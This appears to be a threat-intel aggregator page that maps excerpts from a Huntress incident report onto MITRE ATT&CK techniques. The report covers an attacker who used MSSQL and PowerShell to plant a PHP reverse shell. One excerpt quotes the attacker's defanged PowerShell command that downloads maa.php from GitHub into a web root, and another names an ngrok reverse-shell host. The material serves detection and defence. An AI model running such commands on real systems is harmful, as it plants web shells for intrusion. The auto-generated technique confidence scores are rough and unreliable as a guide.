TTPwire Vol. 1 · MITRE ATT&CK · Tagged


Huntress

Managing Attack Surface | Huntress

2024-03-20

ATT&CK techniques detected

12 predictions
T1059.001 PowerShell
100%
“…] 146, and resulted in "200" status code responses, indicating that they were successful. However, no additional activity appeared to result from these queries. The Attack, Day 2: Day 2 of the attack continued with activity similar to Day 1, in that PowerShell scripts and comman…”
T1059.001 PowerShell
100%
“MSSQL messages in the Windows Event Log dated 28 April 2023, and these observed failed login attempts were the first such messages within the investigative timeline. Subsequent to these attempts, the threat actor's activity began again at 18:27:10 UTC, and continued for app…”
T1059.001 PowerShell
99%
“…mpseevcw.exe. This resulted in Windows Defender generating a detection for Trojan:HTML/WebShell!MSR, based on the container file C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS17\MSSQL\Log\tmpfqckc.txt, and subsequently the file C:\Program Files…”
T1059.001 PowerShell
99%
“ngrok[.]io, the same host listed in maa.php and fata.php. An excerpt of this code can be seen in Figure 4, and is very similar to the code contained in the two PHP files. Examining the web server logs for Day 2 of the attack revealed no GET requests for either maa.php or fa…”
T1059.001 PowerShell
98%
“in Figure 1, a file on the web server, maa.php, was detected by Windows Defender as "VirTool:PHP/Meterpreter.A!MTB". In addition, the use of the native Windows utility, certutil.exe, was detected being used to decode a file on the endpoint. The Huntress detection is ill…”
T1059.001 PowerShell
98%
“location: powershell -command invoke-webrequest -uri 'https[:]//raw.githubusercontent[.]com/hightidaoaa/azdaz/main/maa.php' -outfile 'e:/inetpub/wwwroot/<redacted>/maa.php'. Toward the end of the threat actor's activity for the day, there…”
T1059.001 PowerShell
89%
“was changed from '0' to '1', enabling the stored procedure. This activity was followed by combinations of PowerShell scripts run via sqlservr.exe, EDR telemetry (result of commands in the PowerShell scripts being run) resulting in alerts, and Windows Defender detecting and…”
T1190 Exploit Public-Facing Application
66%
“location: powershell -command invoke-webrequest -uri 'https[:]//raw.githubusercontent[.]com/hightidaoaa/azdaz/main/maa.php' -outfile 'e:/inetpub/wwwroot/<redacted>/maa.php'. Toward the end of the threat actor's activity for the day, there…”
T1059.003 Windows Command Shell
64%
“what could be found in the maa.php and fata.php files, as illustrated in Figure 4. Attack Timeline: Huntress analysts developed an investigative timeline from selected Windows Event Log data, and included pertinent EDR telemetry. The investigative timeline illustrated that the t…”
T1059.001 PowerShell
48%
“…tidaoaa - GitHub repository owner; 0.tcp.eu.ngrok[.]io - target host for reverse shells. MITRE ATT&CK Mapping: Initial Access - T1078.001, Default Accounts; Execution - T1059.001, PowerShell, and T1059.003, Windows Command Shell; Persistence - T1078.001, Default Accounts”
T1059.001 PowerShell
45%
“what could be found in the maa.php and fata.php files, as illustrated in Figure 4. Attack Timeline: Huntress analysts developed an investigative timeline from selected Windows Event Log data, and included pertinent EDR telemetry. The investigative timeline illustrated that the t…”
T1190 Exploit Public-Facing Application
40%
“Managing Attack Surface | Huntress. Background: Given a diverse customer base, Huntress sees a wide range of activity even when it comes to persistent threat actors. When such a threat actor makes attempts to compromise a customer with both managed EDR and managed anti-virus (MA…”

Summary

Huntress recently detected interesting activity on an endpoint: a threat actor was attempting to establish a foothold by using commands issued via MSSQL to upload a reverse shell accessible from the web server. All attempts were obviated by MAV and process detections, but boy-howdy, did they try!